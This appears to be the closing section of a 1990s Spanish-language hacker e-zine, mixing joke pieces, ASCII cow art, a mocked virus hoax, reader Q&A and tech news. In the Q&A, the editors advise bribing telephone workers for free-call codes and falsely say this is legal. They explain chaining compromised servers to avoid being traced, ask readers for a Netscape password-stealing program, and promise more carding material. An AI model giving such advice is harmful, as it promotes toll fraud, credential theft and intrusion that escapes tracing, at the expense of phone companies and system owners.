Execution terminated. 5 errors. $ Move man to Garden of Eden # File ``Garden of Eden'' not found. $ Create Garden # Done. $ Move man to Garden of Eden # Done. $ Run multiplication # Execution terminated. 4 errors. $ Copy woman from man # Done. $ Run multiplication # Execution terminated. 3 errors. $ Insert woman into man # Illegal parameters! Try again! $ Insert man into woman # Done. $ Run multiplication # Execution terminated. 2 errors. $ Create desire # Done. $ Run multiplication # Done. And God saw the man'n woman being fruitful and multiplying in the Garden # Execution for Warning: No time limit on this run. 1 errors. $ Create freewill # Done. $ Run freewill # Done.. And God saw the man'nwoman being fruitful and multiplying in the Garden # Execution Warning: No time limit on this run. 1 errors. $ Undo desire # Desire cannot be undone once freewill is created $ Destroy freewill # Freewill is an inaccesible file and cannot be destroyed. # Enter replacement, cancel, or ask for help. $ Help! # Desire cannot be undone once freewill is created. # Freewill is an inaccesible file and cannot be destroyed. # Enter replacement, cancel, or ask for help. $ Create treeofknowledge And God saw the man'nwoman being fruitful and multiplying in the Garden # Execution Warning: No time limit on this run. 1 errors. $ Create good'nevil # Done. $ Activate evil # Done. And God saw he had created shame. # Warning: System error in sector E96. Man'nwoman not in the Gard.En. 1 errors. $ show Garden # Not found. $ Search Garden for man'nwoman # Searching.... Search Failed . Not Found. $ Delete shame # Shame cannot be deleted once evil has been activated. $ Destroy freewill # Freewill is an inaccesible file and cannot be destroyed. $ Stop # Unrecognizable command. Try again! $ Break $ Break $ Break # ATTENTION ALL USERS: ATTENTION ALL USERS: # COMPUTER GOING DOWN FOR REGULAR DAY OF MANTENANCE # PLEASE SIGN OFF $ Create new world # You have exceeded your allocated file space. Please delete old files. $ Destroy earth. # Destroy earth. Please confirm. # Confirmation Timed out. Cancelling Action. COMPUTER DOWN. COMPUTER DOWN # SERVICES WILL RESUME ON SUNDAY MARCH 8 AT 6:00 A.M # YOU MUST SIGN OFF NOW! # You have been disconected from SimUniverse Server. And God signed off at 11:59 p.m., Friday, March 6. And God saw he had zero funds remaining. HiGhLaNdEr LeT YoUr SoUl Be YoUr PiLoT -|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| (__) )__( vv vv (oo) (oo) ||----|| * /-------\/ *-------\/ || | / / | || / | || /\-------/ * ||----|| / ||----|| (oo) ^^ ^^ vv vv (~~) USA Vaca Nerd USA Vaca Vaca Australiana (__) (__) (__) (00) (-o) (--) . . . (*>YAWN<*) /------\/ /------\/ /------\/ /| || /| || /| || * ||----|| * ||----|| * ||----|| Vaca con lentes Vaca Coqueta Vaca sin dormir O__O \_|_/ (oo) (oo) /-------\/ /-------\/ / | || / | || * ||----|| * ||----|| ^^ ^^ ^^ ^^ Vaca en Disneylandia Vaca visitando la estatua de la libertad \ (__) (__) * (__) \\(oo) (\/) \ (oo) /-----\\\/ /-------\/ \-------\/ / | (##) / | || 8-| || * ||----||" * ||----|| ||----|| ^^ ^^ ~~ ~~ ^^ ^^ Vaca escocesa tocando gaita Vaca de Beijing * (__) (__) (__) (__) \ (oo) (oo) (oo) (oo) \-------\/ /-------\/ /-------\/ /-------\/ /| |\ / / \ / \ / / \ \ //||----||\\ * //------\\ * \\--// * \\----\\ ^ ^^ ^^ ^ ^ ^ ^ ^ ^ ^ Vaca caminando Vaca trotando Vaca corriendo Vaca frenando (__) (oo) (__) * (__) \/ (oo) | (oo) ____| \____ /-------\/ o=o=o=|------\/ ---/ --** / | / | | *____/ |___// * ||----|| ||----|| //--------/ ^^ ^^ ^^ ^^ //__ Vaca marchando Vaca parada Vaca cagando (__) (oo) U /-------\/ /---V / | || * |--| . * ||----|| ^^ ^^ Vaca a 1 metro. Vaca a 100 metros. Vaca a 10,000 metros. (__) (__) (__) (__) (oo) (oo) (oo) (oo) /-------\/-* /-------\/ /-------\/ ~~~~~~~~~~~~~~~~~ / | || \ )*)(\/* / * / | || * ||----|| * \ |||/)|/()( ~~~~~~~~~~~~~~ \/|(/)(/\/(,,/ \)|(/\/|)(/\ Vaca comiendo Vaca comiendo Vaca en agua Vaca nadando pasto vaca (__) (__) (__) (OO) (@@) (xx) /-------\/ /-------\/ /-------\/ / | || / | || / | || * ||----|| * ||----|| * ||----|| ^^ ^^ ^^ ^^ ^^ ^^ Vaca que tomo Jolt Vaca que comio hongos Vaca que uso Jolt para lavar psychodelicos hongos psychodelicos )\ (__) / \ (oo) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vaca nadando en agua con tiburones ( ( ) ( ( ) ) ( ( ) ( / ) ( ( \\ ) ( | // ) | | (__) | | (oo) (__) | | ----\/ ______(oo)_____ | | || ( _)_______(__) ) **| | ---|| \ __________/ ``'---------^^ Vaca escondida Pay de vaca * ** ** * ** * * * ** * / / \ * * \ \ / \ / / (__) * / / \ \ (__) \ \ /--------(00) / (00) / / / | |( ) \ /-------\/ \ \ * ||---- ||() / / | || / / || || \ \ * ||----|| \ \ ^^ ^^ / / ^^ ^^ / / Vaca masticando canicas Vaca en calor (__) (__) * (__) * (__) (oo) (oo) \ (oo) | (oo) /--------\/ /-oooooo-\/ \-------\/ \-------\/ * o| || * ooooooooo o o| || / || ||----|| ooooooooooooo ||----||>==/-----|| ooo^^ ^^ ooooooooooooooooo ^^ ^^ ^^ Vaca cagando Vaca en deep shit Vaca que le estan pateando la caca fuera de ella /\ __ / \ || (__) (__) \ / (_||_) SooS (oo) \/ (oo) /------S\/S /-------\/ /S /-------\/ / | || / | || / S / | || * ||----|| * ||----||___/ S * ||----|| ^^ ^^ ^^ ^^ ^^ ^^ Vaca de George Washington Vaca de Ben Franklin Vaca de Abe Lincoln (__) (__) (oo) (oo) /'^^^-m /---+ +--\/ / '' ` ) / | | | || | /| * ||-+ +-|| | | | | ^^ ^^ |_____|_| Vaca de David Copperfield //|| || * ww ww Vaquidracula (__) (__) (__) (\/) ($$) (**) /-------\/ /-------\/ /-------\/ / | 666 || / |=====|| / | || * ||----|| * ||----|| * ||----|| ^^ ^^ ^^ ^^ ^^ ^^ Vaca satanica Vaca Yuppie Vaca enamorada (____) (____) (oo ) (o o) /-----------\ / /-----\ /---- / || | \/ / | | \/ | / || |||| \ | | | | | * ||||-----|||| *| | |-----| | | /\/\ /\/\ /\ /\ /\ /\ Vaca de Pablo Picasso Vaca de Salvatorre Dali (__) ^^ (oo) ^^^^ /-------\/ ^^^^^ / | || ^^^^^ * ||----|| ^^^^^^^^ ====^^====^^==== ^^^^^^^^^^^^^/ ^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Vaca surfeando en Malibu * \ \ |\ \ | \ (__) \\|| \(oo) \||\ \\/ ^^ \|| \\ || \\|| \|| ^^ \\_ \_ Vaca skiando en Aspen Colorado o o (__) ^ \ / (oo) / \ / _____\/___/ (__) \__/ / /\ / / (oo) _______(oo) ^ / * / /---------\/ /| ___ \/ / ___/ / | x=a(b)|| / | { }|| *----/\ * ||------|| * ||{___}|| / \ ^^ ^^ ||-----|| / / ^^ ^^ ^ ^ Vaca Matematica Vaca de T.V. Vaca bailando disco despues aspirar cow-caine o | [---] | | | | |------========| /----|---|\ | **** |=======| /___/___\___\ o | **** |=======| | | ___| |==============| | | ___ {(__)} |==============| \-----------/ []( )={(oo)} |==============| \ \ / / /---===--{ \/ } | ----------------- / | NASA |==== | | | * ||------||-----^ ----------------- || | | / / \ \ ^^ ^ | / ---- \ ^^ ^^ Vaca llegando a la Luna //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ A TODOS LOS USUARIOS DE INTERNET INFORMACION PROVENIENTE DE IBM INTERNACIONAL Este mensaje debe ser comunicado a cualquier persona que tenga acceso a Internet. Si alguien recibe un mensaje de correo electronico llamado "Pental Greetings", por favor BORRARLO SIN ABRIR!!! Esta es una advertencia para todos los usuarios de internet. Existe un virus muy peligroso que esta distribuyendose a traves de la red de Internet y llamado " PENPAL GREETINGS". NO ABRIR EL MENSAJE LLAMADO "PENPAL GREETINGS" ! Este mensaje aparenta ser una carta amigable preguntandole si usted esta interesado en penpal (??), pero para el tiempo que Usted lea el mensaje, es demasiado tarde!!: el virus "TROJAN HORSE" habra infectado ya el sector boot de su sistema, BORRANDO TODOS SUS DATOS. Este es un virus auto-regenerable y tan pronto como el mensaje ha sido leido, se expandera automaticamente a todas las direcciones de correo electronico contenidas en su directorio (Mail box). Este virus destruira su disco duro y tiene el potencial de destruir el disco duro de cualquiera presente en su directorio. Si el virus se sigue propagando, podria causar danos catastroficos en la red mundial de Internet! Asi que por favor, BORRE el mensaje "PENPAL GREETINGS" antes de leerlo!! y envie este mensaje a todas las personas que conozca y que usen Internet para advertirlos acerca de este virus!! [ La estupidez *si* crece en los arboles... ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Como limpio el Cache de mi browser?? [ si usas microsoft explorer simplemente borra todos los archivos que tengas en el directorio C:\WINDOWS\CACHE Si usas Netscape borra los archivos que tengas en c:\netscape\cache o c:\program files\netscape\cache Existe otra forma mas "chic" de hacerlo y es en opciones, limpiar cache o en configuracion, network preferences, clean disk cache. ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ me gustaria tener los codigos de telefonos para llamar gratis de mi pais, como podria conseguirlos ?? [ simplemente consigue un billete de 20 dolares (puede ser falso) y cuando veas a tu trabajador telefonico mas cercano acercate, cuentale lo mucho que te gustaria conocer el sistema telefonico y cuando menos lo espere... BAMM! Ofrecele los 20 dolares a cambio de los tonos para marcar gratis que alguien te platico, si no acepta o dice que no existen entonces preguntale por claves para llamar gratis. Generalmente aceptan y no es delito en caso de amenazarte retirate y espera la proxima camioneta telefonica :-) No te dejes cuando te pida tu direccion, si no los tiene y te dice que luego pasa a dejarte los tonos grabados en un cassette citalo en una esquina lejos de tu casa y si puedes prueba los tonos antes de entregarle el dinero. ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ empezando en este rollo , aparte de ser muy padre y me gustaria saber como colaborar con ustedes , espero pronto su respuesta ! GrAcIaS !! [ para colaborar con nosotros envia todo lo que puedas a RareGaZz@Bigfoot.com links a software, revisiones de peliculas, revistas y modos de vida son bienvenidos. Esta revista es para ustedes unicamente y de ustedes depende que siga saliendo como hasta el momento. ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Bueno, les planteo algo (para fines educacionales, logico) necesito hallar los passwords que configure de unos emails... resulta que ya configure el netscape. Lo que me falta es unicamente mandar un programa que sea compatible con Windows y que pueda utilizar para el netscape. Un programa busca passwords. [ Si alguien tiene informacion sobre los passwords en netscape navigator o tienen un programa que saque el pass de ese programa envienlo...] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ HAL-9000 BBS Internet - Morelia UMSHN - Universidad Michoacana de San Nicolas HAL-9000 BBS Internet es el nuevo hermano de HAL-9000 Fidonet el originalismo HAL-9000 BBS. Este tiene la ventaja de que puede ser accesado via Internet, de cualquier parte de mundo, ademas de que es multiusuario. El enfoque de este BBS es hacia foros o boards;tambien tiene capacidad de chat. Actualmente esta configurado para aceptar unicamente 10 conexiones simultaneas. Para accesar HAL-9000 BBS Internet : telnet://bbs.ccu.umich.mx IMPORTANTE: En respuesta al login escribe bbs y return, cuando pida el password. //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Si por algun motivo no pueden entrar a i-net para obtener su copia de este E-Zine o quieren entrar en ambiente hacker en Mexico DF pueden marcar el numero 280-2899 de Alfa BBS...chequenlo y luego me cuentan que tal ok? ALFA BBS 280-2899 Mexico D.F., //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ sobre algo que habian dicho en uno de los numeros de la revista sobre el hackear con condon, tengo una duda... no importa que tan lejos o que tan cerca esten los servidores a donde te conectas antes de llegar a tu objetivo? por ejemplo. podria conectarme a 4 distintos servidores que estan dentro de la ciudad de mexico y despues llegar a mi objetivo , igual dentro de la ciudad y no habria problema de rastreo? bueno, ojala que me contesten pronto! [ La razon de hackear a travez de varios servidores es unicamente para que a las personas que quieran rastrearte se les dificulte el tener que andar revisando logs de distintos servidores. Obviamente si hackeaste al servidor blanco a travez del servidor negro y gris, cuando el administrador quiera llegar a ti necesita pedir ayuda al administrador del servidor negro para localizar al usuario que lo hackeo. Despues el administrador del servidor negro notara que el hacker no es un usuario local sino que entro desde el servidor gris por lo que el tambien necesitaria pedir ayuda al otro administrador y asi... Obviamente NUNCA UN ADMINISTRADOR PEDIRA AYUDA A OTRO PARA AGARRAR A UN HACKER!!! Hacerlo significaria aplastar su orgullo para decir "un hacker me supero y entro a mi sistema".Y en caso de hacerlo, si el hacker uso otro ordenador para entrar a hackear,el otro administrador probablemente no se atreva a contestar "ese hacker tambien burlo mi seguridad entrando desde X sistema" por lo que generalmente le dira que no encontro nada en sus logs y todo el asunto se olvidara y asi ninguno de los dos administradores perdera su trabajo. Creanme esto que les digo, en mi carrera de hacker he conocido a muchos admins y conozco sus formas de pensar. Obviamente no todos los admins son iguales pero aquellas raras excepciones *realmente* se esmeran en proteger sus sistemas y no tienen problemas de hackers :) perdon por la respuesta tttaaaannnn larga . . . ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Todos ustedes habran escuchado la noticia sobre las carreteras de Los Angeles California. Es probable que dentro de poco tiempo los carros circulen por esos caminos sin intervencion humana; asi es, la persona detras del volante tendra manos y piernas libres mientras el carro ayudado por satelites y emisores electricos en el camino maneje por la carretera. Esto es genial, sobre todo en la ciudad sede del descubrimiento ya que en Los Angeles como en cualquier parte del mundo es dificilisimo disparar una escopeta mientras se maneja :-) Afortunadamente el software que controlara las habilidades de manejo del automovil no sera creado (en el momento) por Microsoft de lo contrario las prisiones se inundarian de malos programadores ya que por primera vez sus BUGS costaran no solo frustracion para el usuario, sino sus vidas... :) raretrip //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Pues aqui molestando de nuevo y tengo una duda, bueno mas que una duda es una peticion: En su numero 4 lei su articulo sobre CARDING ademas de que en un numero anterior lei el articulo sobre INGENIERIA SOCIAL por lo que estoy muy interesado sobre el CARDING. Asi que quisiera poder leer otro articulo sobre CARDING para ir aumentando mis conocimientos sobre este tema. [ proximamente escribire una continuacion del texto por Mr.X basado en algunas experiencias de amigos ... >:-) ] //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ Ferca Network: http://www.ferca.net Web Personal: http://www.ferca.net/ferca Lo que es gratis en Internet: http://www.ferca.net/esgratis A nosotros nos llego la invitacion a este sitio y espera le envien sus comentarios sobre toda la informacion que tiene disponible en su pagina. [ El link ya esta en la pagina web seccion internet. CkSmkr ] - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - http://www.class.udg.mx/~victorov/ Si les gustan los virus o quieren aprender como esta eso de la inteligencia artificial visiten esta pagina. Tal vez luego nos haga un resumen de su trabajo con los virus para la revista :-) P.D. Gracias a el conseguimos el virus ZHENGXI ! [ El link esta en la seccion de hacking en la pagina web. CkSmkr ] La revista dejara de hacer las 'reseñas' desde este numero. La ultima vez que puse links fue por agradecimiento a unas paginas que usaron uno de nuestros logos para poner un link a la pagina. //////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\ GR337Z 4 70D0S L0S Qu3 N0S 4YuD4N 4 3L4B0R4R 3S74 R3ViS74 Y 74MBi3N 4 L0S Qu3 N0S 4YuD4N C0N L4 P4GiN4 W3B C0N C0M3N74Ri0S Y/0 GR4FiC4S. 3N 3SP3Ci4L uN S4LuD0 C0M0 Si3MPR3 4 V0V_77, 7uC4NX, 4RK4NG3L, 4CiDGuM, RiCKY, M3G4FL0P, XD4WN, GuYBrU2H Y 4 70D0S L0S CHiC0S M4L0S D3 RDK. S4LuD0S 3SP3Ci4L3S V4N P4R4 GR00VY Y S3RV3RH4CK3R P0R S4C4R 4D3L4N73 Nu3S7R4 0LViD4D4 S3CCi0N D3 N07iCi4S. 0K! L0S CR3Di70S H4N SiD0 D4D0S... [ culpese a los hackers de la degeneracion de la escritura. CkSmkr ] >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< / \ /\\ /\ /\ //\\ /\ / /\ // \\ /\ \ /\ / / // \\ / /\ \ / / /\/ \ \ / /\ \ / / // __/ / \_/ // \ \/ / \ \ / / // __/ \ \ \ \ \/ \/ // /\ \\ // Cuando matas a un hombre, eres asesino \/ Cuando matas muchos, eres un conquistador Cuando matas a todos... eres un dios. Megadeth Bienvenidos a la primera *verdadera* seccion de noticias en una revista electronica. Para ser la primera vez que hacemos esta seccion nosotros creo que nos quedo aceptable >;) Disfruten esta nueva presentacion de NotiLOONS; manden sus comentarios y noticias... ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) En su convencion anual la asociacion britanica de medicos recomendo legalizar los quimicos que alteran los sentidos de la marijuana. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) Netscape BUG Netscape dice que cuando aparezca un boton de "warning" en un sitio inseguro, presionen CANCEL. Netscape dice que es un bug no muy serio pero esto depende de cada persona. yo creo que un bug que permita buscar archivos en tu disco duro y luego subirlos a la pagina es bastante serio...pero netscape no lo piensa asi. Todos saben que netscape tiene una funcion que permite subir archivos de tu disco a un servidor verdad? pues el bug permite hacer esto sin que el usuario se de cuenta! la unica cosa necesaria es saber la localizacion exacta del archivo deseado. Un ejemplo seria agarrar el c:\netscape\cache\fat.db del disco de algun visitante para ver el nombre de las paginas y el URL de cada lugar que haya visitado. existen mas formas de explotar este bug. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) Alemania a aprobado la primera gran ley de internet, diciendo que es un crimen poner contenido ilegal en Alemania si es tecnica y razonablemente posible prevenirlo. Las penas estan en duda aun. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) El "profesional en sistemas" -como prefiere que lo llamen- que descubrio el BUG en el servidor de microsoft ha decidido no cooperar con microsoft para cualquier problema relacionado con la seguridad debido al "mal trato" que recibio de la compañia del magnate Gates. La persona esta que niega ser un "hacker" a empezado a vender con exito en su sitio web camisetas con la leyenda "I crash the microsoft website and all i got was this damn t-shirt" (Yo estrelle el sitio de microsoft y todo lo que me dieron fue esta maldita camiseta). Esto es una broma a microsoft que le ofrecio una camiseta y descuento en cupones para software por su ayuda. Actuando como todo el hacker que dice no ser, no acepto la oferta de microsoft y se niega a cooperar en futuras ocasiones con esa compañia. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) Varias redadas en la ciudad de Madrid con motivo de operativos policiales para derribar a los hackers que habitan en el pais de España. Los operativos han sacado momentaneamente de circulacion a un popular servidor de paginas web gratuitas (www.islatortuga.com) para hackers pero ya esta de nuevo on-line al parecer no por mucho tiempo. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) Ahora que el Partido Revolucionario Institucional (PRI) ya no tiene la mayoria en la camara de diputados, se corre el riesgo de una !! DIVISION DEL PODER EN MEXICO !! Concretamente el riesgo es que se divida el poder en Legislativo, Judicial y Ejecutivo... cosa que destruiria a Mexico >:-] El Chamuco año 1 numero 36 ~~~~~~~~~~~~~~~~~~~~~~~~~~ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) El dictador de Peru Alberto Fujimori esta a punto de ser corrido a patadas de su propio pais por haber introducido el modelo economico neo-liberal. Hermanos peruanos nosotros los mexicanos se los decimos por experiencia, cuando Fujimori termine en Irlanda llegara otro dictador mas pendejo y las cosas seguiran igual . . . :) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) DETROIT - General Motors anuncio que empezara a sacar del publico 292,860 pontiacs, oldsmobiles y buicks de los modelos 1996 y 1997 por un error en el software de la maquina que puede resultar en fuego. Los carros son los pontiac bonneville 1996, oldsmobile noventa y ocho, ochenta y ocho, buick park avenue, lesabre, riviera, regal, y algunos buick le sabres 1997. General Motors dijo que un error en la secuencia en el sistema del motor puede ocasionar un fuego durante el arranque. Con la proliferacion de la tecnologia de computadoras en los automoviles, tenia que pasar algun dia... ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) Tenia que pasar tarde o temprano. IDT Corp esta instalando ya su nuevo producto Net2Phone Direct, un servicio telefonico de Internet que puedes usar desde cualquier telefono (Nueva York Inicialmente). Tu marcas a un servidor de red que contacta a otro servidor para completar la llamada. Las tarifas son espectacularmente bajas: 8 centavos de dolar el minuto nacional, 18 centavos internacional. De ahora en adelante ya saben a quienes culpar cuando el trafico en internet sea pesado :) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) El primer Torneo de QUAKE para mujeres esta en estos momentos... http://www.slamsite.com/aft/ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) Excite (www.excite.com) sera la primera maquina de busqueda en ofrecer un servicio gratuito de email. Estaremos checando ese servicio... ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) Un operador de Geocities removio una pagina aparentemente puesta por jovenes que contenia las calificaciones de looks y personalidad de unas 152 chicas de octavo grado en alguna escuela de Palo Alto CA. La calificacion mas alta del look de una chica fue 9 y el mas bajo en personalidad 1/7. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) La caja TVMessenger de $99 disponible en internet, se conecta al telefono y a la television para mostrar en pantalla el Caller ID de cualquier persona que llame. Tambien muestra llamadas en espera y mas... ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) El operador de satelites Arabsat dice que no reconsiderara su censura total en el canal Telecom de Francia despues de que la estacion francesa transmitio una pelicula porno a todo el mundo arabe el sabado haciendo enojar a los seguidores del Islam. Un error tecnico (y no un hacker) fue culpado. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) IBM anuncio dos computadoras de red (network computers) a tan solo $799 US.dlls cada una. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) El 31 de Julio American Online empezara a vender los numeros telefonicos de sus miembros a compañias de telemarketers. [ que mas puede esperarse de AOL?? ] (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) En Los Angeles California un revolucionario invento ha sido creado que permite a un auto manejar por las autopistas de esa ciudad sin necesidad de chofer. (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) El jueves 31 de julio (1997) Dave Foley de NBC radio news iniciara una sesion de chat con su publico a las 9:00pm hora de Los Angeles en chat.yahoo.com Tal vez nosotros hagamos algo parecido proximamente... (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) "El uso de esta seccion sin autorizacion firmada electronicamente con la llave pgp de la revista RareGaZz esta estrictamente prohibido." (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) (+) Nosotros tenemos las noticias interesantes...los demas NO! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ -=[NotiLOONS]=- +Groovy+ +ServerHacker+ >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< **FIN**FIN**FIN**FIN**FIN**FIN**FIN**FIN*FIN**FIN**FIN**FIN**FIN**FIN**FIN** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< Un bocado mental... - Existe un puente donde para pasar es necesario decir una frase verdadera a el jurado mas justo del mundo. Si la frase es verdadera pasaras por el puente, si la frase es mentira mueres ahorcado. Se sabe de una persona que dijo la frase: `morire ahorcado'. Si el jurado lo ahorcaba la frase era verdadera y entonces debia pasar, pero si lo dejaban pasar la frase seria mentira y entonces debia morir. Para solucionar el conflicto su novia corrio con el juez supremo a 10 millas de distancia y este le escribio un recado que debia llevar a el jurado. La novia llego y el jurado leyo el mensaje: " El hombre podra pasar unicamente si la frase que aparece al reverso del papel es verdadera. " El jurado confundido leyo el reverso del papel y decia: " Lo que dice el otro lado del papel es falso. " RareGaZz se despide de ustedes preguntandoles... ¿ morira esta persona ?